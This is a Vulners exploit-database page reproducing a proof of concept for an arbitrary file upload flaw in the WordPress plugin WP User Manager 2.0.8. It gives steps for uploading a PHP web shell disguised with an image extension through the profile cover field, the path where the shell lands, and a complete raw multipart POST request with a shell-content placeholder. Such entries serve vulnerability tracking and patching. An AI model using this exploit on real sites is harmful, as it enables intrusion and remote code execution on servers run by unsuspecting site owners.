Vulners
Lucene search
WordPress WP User Manager 2.0.8 Shell Upload
`# Exploit Title: Wordpress Plugin WP User Manager 2.0.8 - Arbitrary file upload
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: February 5, 2019
# Vendor Homepage: https://wpusermanager.com
# Software Link : https://wordpress.org/plugins/wp-user-manager/
# Tested Version: 2.0.8
# Tested on: Kali linux, Windows 8.1 / Wordpress 4.9.8
# Note: Free edition is vulnerable, other versions may also be affected.
# PoC:
# 1.- Login to site and go to your profile setting
# 2.- In profile cover image section, you can upload your shell by adding image extensions to end of your shell. (ex: SHELL.php.png)
# 3.- Click on "Update Profile"
# You can see your shell in /wp-content/uploads/wp-user-manager-uploads/[year]/[month]/SHELL.php.png
# PoC header:
POST /wordpress/?page_id=214&updated=success HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/?page_id=214&updated=success
Content-Type: multipart/form-data; boundary=---------------------------1794372498243154061698264842
Content-Length: 2142
Cookie: wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=root%7C1547649639%7CwJOz9suousR6JF7I0vqY76uoTRfAwA7bE0diqvzfxjP%7C8fbaaff802e0459d5aa4a1f581eb78053d63c4d024ef4d6048eb7c7c952b8ff5; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dhtml%26post_dfw%3Doff; wp-settings-time-1=1547476851
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="user_cover"; filename="SHELL.php.jpeg"
Content-Type: image/jpeg
{{"SHELL CONTENT"}}
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="user_email"
{{"Email"}}
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="user_firstname"
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="user_lastname"
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="user_nickname"
root
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="user_displayname"
display_nickname
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="user_website"
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="user_description"
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="wpum_form"
profile
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="step"
0
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="account_update_nonce"
df63baa04c
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="_wp_http_referer"
/wordpress/?page_id=214&updated=success
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="submit_account"
Update profile
-----------------------------1794372498243154061698264842--
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Feb 2019 00:00Current
7.4High risk
Vulners AI Score7.4